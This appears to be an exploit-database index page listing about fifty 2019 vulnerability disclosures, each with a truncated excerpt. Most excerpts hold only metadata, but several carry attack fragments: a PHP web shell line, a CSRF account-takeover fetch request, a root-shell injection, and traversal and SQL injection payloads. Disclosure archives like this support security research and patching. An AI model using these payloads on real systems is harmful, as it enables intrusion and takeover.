Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Serv-U FTP Server prepareinstallation Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on systems running...

Symantec DLP 15.5 MP1 - Cross-Site Scripting

Exploit Title: Persistent XSS on Symantec DLP = 15.5 MP1 Date: 2019-06-21 Exploit Author: Chapman Schleiss Vendor Homepage: https://www.symantec.com/ Software Link: https://support.symantec.com/us/en/mysymantec.html Version: = 15.5 MP1 CVE : 2019-9701 Advisory-URL:...

Centreon 19.04 - Remote Code Execution

!/usr/bin/python ''' Exploit Title: Centreon v19.04 authenticated Remote Code Execution Date: 28/06/2019 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2019-13024 Vendor Homepage: https://www.centreon.com/ Software link: https://download.centreon.com Version: v19.04 Tested on: CentOS 7.6 / PHP...

Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mac OS X TimeMachine tmdiagnose Command Injection Privilege Escalation', 'Description' = %q This module exploits a command injection in TimeMachi...

FaceSentry Access Control System 6.4.8 - Remote SSH Root

!/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorith...

FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery

FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorithm A14 Summary: FaceSentry 5AN is a...

CyberPanel 1.8.4 - Cross-Site Request Forgery

Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...

ZoneMinder 1.32.3 - Cross-Site Scripting

Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting filters Google Dork: None Date: 6/29/2019 Exploit Author: Joey Lane Vendor Homepage: https://zoneminder.com Software Link: https://github.com/ZoneMinder/zoneminder/releases Version: 1.32.3 Tested on: Ubuntu 16.04 CVE : Pending...

PowerPanel Business Edition - Cross-Site Scripting

Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting SNMP trap receivers Google Dork: None Date: 6/29/2019 Exploit Author: Joey Lane Vendor Homepage: https://www.cyberpowersystems.com Version: 3.4.0 Tested on: Ubuntu 16.04 CVE : Pending CyberPower PowerPanel Business Edition...

WorkSuite PRM 2.4 - 'password' SQL Injection

=========================================================================================== Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj. Dork: N/A Date: 01-05-2019 Exploit Author: Mehmet EMİROĞLU Vendor Homepage: https://codecanyon.net/item/worksuite-project-management-system/20052522...

FaceSentry Access Control System 6.4.8 - Remote Command Injection

FaceSentry Access Control System 6.4.8 Remote Command Injection Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorithm A14 Summary: FaceSentry 5AN is a revolutionar...

Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit from github repro: https://github.com/b1ack0wl/linuxmintpoc class MetasploitModule "Linux Mint 'yelp' URI handler command injection vulnerability", 'Description'...

FaceSentry Access Control System 6.4.8 - Remote Root Exploit

!/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote Root Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorithm A14...

CiuisCRM 1.6 - 'eventType' SQL Injection

=========================================================================================== Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj. Dork: N/A Date: 27-05-2019 Exploit Author: Mehmet EMİROĞLU Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489 Software Link:...

Sahi pro 8.x - Directory Traversal

Exploit Title: Sahi pro 8.x Directory traversal Date: 2019-06-25 Exploit Author: Operat0r Vendor Homepage: https://sahipro.com/ Software Link: https://sahipro.com/downloads-archive/ Version: 8.0 Tested on: Linux Ubuntu / Windows 7 CVE: CVE-2019-13063 An issue was discovered in Safi-pro...

SAP Crystal Reports - Information Disclosure

Exploit Title: Sensitive Information Disclosure in SAP Crystal Reports Date: 2019-04-10 Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114 Version: SAP Crystal Reports for Visual Studio, Version - 2010...

Varient 1.6.1 - SQL Injection

=========================================================================================== Exploit Title: Varient 1.6.1 SQL Inj. Dork: N/A Date: 29-06-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://varient.codingest.com/ Software Link: https://varient.codingest.com/ Version: v1.6....

LibreNMS 1.46 - 'addhost' Remote Code Execution

!/usr/bin/python ''' Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution Date: 24/12/2018 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2018-20434 Vendor Homepage: https://www.librenms.org/ Version: v1.46 Tested on: Ubuntu 18.04 / PHP 7.2.10 ''' import requests from urllib import...

Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion

The following program found through fuzzing and manually modified crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 current stable: // Run with --no-threads for increased reliability const v4 = a: 0, a: 1, a: 2, a: 3, a: 4; function v7v8,v9 if v4.length == 0 v43 = a: 5; ...

Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Nagios XI Magpiedebug.php Root Remote Code Execution", 'Description' = %q This module exploits two vulnerabilities in Nagios XI 5.5.6:...

SuperDoctor5 - 'NRPE' Remote Code Execution

SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. This is an intended feature but leaves the system open by default to unauthenticated remote command execution by abusing the...

WordPress Plugin iLive 1.0.4 - Cross-Site Scripting

Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Google Dork: - Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link: https://codecanyon.net/item/ilive-wordpress-live-chat-support-plugin/20496563...

BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal

Exploit Title: Directory Traversal on BlogEngine.NET Date: 24 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10717 1. Description ============== BlogEngine.NET is vulnerable to a directory traversal. The page...

AZADMIN CMS 1.0 - SQL Injection

Sql Injection on AZADMIN CMS of HIDEA v1.0 + Date: 24/06/2019 + CWE Number : CWE-89 + Risk: High + Author: Felipe Andrian Peixoto + Vendor Homepage: https://www.hidea.com/ + Contact: [email protected] + Tested on: Windows 7 and Linux + Vulnerable Files: newsdet.php + Dork :...

WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting

Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection Google Dork: inurl:"wp-content/plugins/screets-lcx" Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: https://screets.com/ Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877 Version: 2.8.3 Tested on:...

SAPIDO RB-1732 - Remote Command Execution

Exploit Title: SAPIDO RB-1732 command line execution Date: 2019-6-24 Exploit Author: k1nm3n.aotoi Vendor Homepage: http://www.sapido.com.tw/ Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732TCv2.0.43.bin Version: RB-1732 V2.0.43 Tested on: linux import requests...

Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution

Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF Date: 2019-06-19 Exploit Author: @XORcat Vendor Homepage: https://fortinet.com/ Software Link: Customer Account Required Version: v1.2.0.0 Tested on: Linux CVE : TBA !-- FCM-MB40 CSRF to RCE as root, by Aaron Blair @xorcat Full...

SeedDMS versions < 5.1.11 - Remote Command Execution

Exploit Title: Remote Command Execution through Unvalidated File Upload in SeedDMS versions "; $cmd = $REQUEST'cmd'; system$cmd; echo ""; die; ? Step 3: Now after uploading the file check the document id corresponding to the document. Step 4: Now go to...

GrandNode 4.40 - Path Traversal / Arbitrary File Download

Exploit Title: GrandNode Path Traversal & Arbitrary File Download Unauthenticated Date: 06/23/3019 Exploit Author: Corey Robinson https://twitter.com/CRobSec Vendor Homepage: https://grandnode.com/ Software Link:...

SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting

Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11 Google Dork: NA Date: 20-June-2019 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...

Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation

Windows: Windows Font Cache Service Insecure Sections EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The Windows Font Cache Service exposes section objects insecurely to low privileged...

SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting

Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.GroupMgr.php in SeedDMS before 5.1.11 Google Dork: NA Date: 17-June-2019 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...

GSearch 1.0.1.0 - Denial of Service (PoC)

Exploit Title: GSearch v1.0.1.0 - Denial of Service PoC Date: 6/23/2019 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693 Version: 1.0.1.0 Tested on: Windows 10 Proof of Concept: Run the python script, it will create a new fi...

dotProject 2.1.9 - SQL Injection

Exploit Title: dotProject 2.1.9 - Multiple Sql Injection Poc Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://dotproject.net Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip Version: 2.1.9 Category: Webapps Tested on: Xampp for Windows Software...

Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation

Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The kernel’s CmpAddRemoveContainerToCLFSLog function doesn’t...

EA Origin < 10.5.38 - Remote Code Execution

Exploit Title: EA Origin 10.5.38 Remote Code Execution Date: 05/22/2019 Exploit Author: Dominik Penner @zer0pwn Vendor Homepage: https://www.origin.com Software Link: https://www.origin.com/can/en-us/store/download Version: 10.5.38 and below Tested on: Windows 7, Windows 8, Windows 10 CVE :...

Linux - Use-After-Free via race Between modify_ldt() and #BR Exception

/ When a BR exception is raised because of an MPX bounds violation, Linux parses the faulting instruction and computes the linear address of its memory operand. If the userspace instruction is in 32-bit code, this involves looking up the correct segment descriptor and adding the segment offset to...

Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability', 'Description' = %q This module exploits a vulnerability...

BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection

Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET Date: 19 June 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10718 1. Description ============== BlogEngine.NET is vulnerable to an Out-of-Band...

Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Prime Infrastructure Runrshell Privilege Escalation', 'Description' = %q This modules exploits a vulnerability in Cisco Prime...

WebERP 4.15 - SQL injection

Exploit Title: Blind SQL injection in WebERP. Date: June 10, 2019 Exploit Author: Semen Alexandrovich Lyhin https://www.linkedin.com/in/semenlyhin/ Vendor Homepage: http://www.weberp.org/ Version: 4.15 A malicious query can be sent in base64 encoding to unserialize function. It can be deserialize...

Tuneclone 2.20 - Local SEH Buffer Overflow

Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.- Run python code : TuneClone.py 2.- Open EVIL.txt and cop...

BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution

Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1. Description ============== BlogEngine.NET is vulnerable to a Directory Traversal through th...

BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution

Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10719 1. Description ============== BlogEngine.NET is vulnerable to an Directory Traversal on...

Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)

/ CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin @vastart - twitter.com/vastart https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe / include include include int main char vulnargs = "" ; id; echo 'opening root shell' ;...

Sahi pro 8.x - Cross-Site Scripting

Exploit Title: Sahi pro alertdocument.cookie”.start; log“testing stored XSS injection”; $tc1.end; Step 2 : Execute the created script poc.sah using sahi GUI controller . Step 3 : navigate to the web logs console http://:/logs using the browser for the executed script. XSS is triggered...

Sahi pro 7.x/8.x - Directory Traversal

Exploit Title: Sahi pro :/s/dyn/Loghighlight?href=../../../../windows/win.ini&n=1selected...

Sahi pro 8.x - SQL Injection

Exploit Title: Sahi pro :/s/dyn/pro/DBReports?sql=SELECT DISTINCT memoryused AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS. FROM SUITEREPORTS,SCRIPTREPORTS...

Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow

X41 D-Sec GmbH Security Advisory: X41-2019-002 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL:...

Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow

X41 D-Sec GmbH Security Advisory: X41-2019-001 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL:...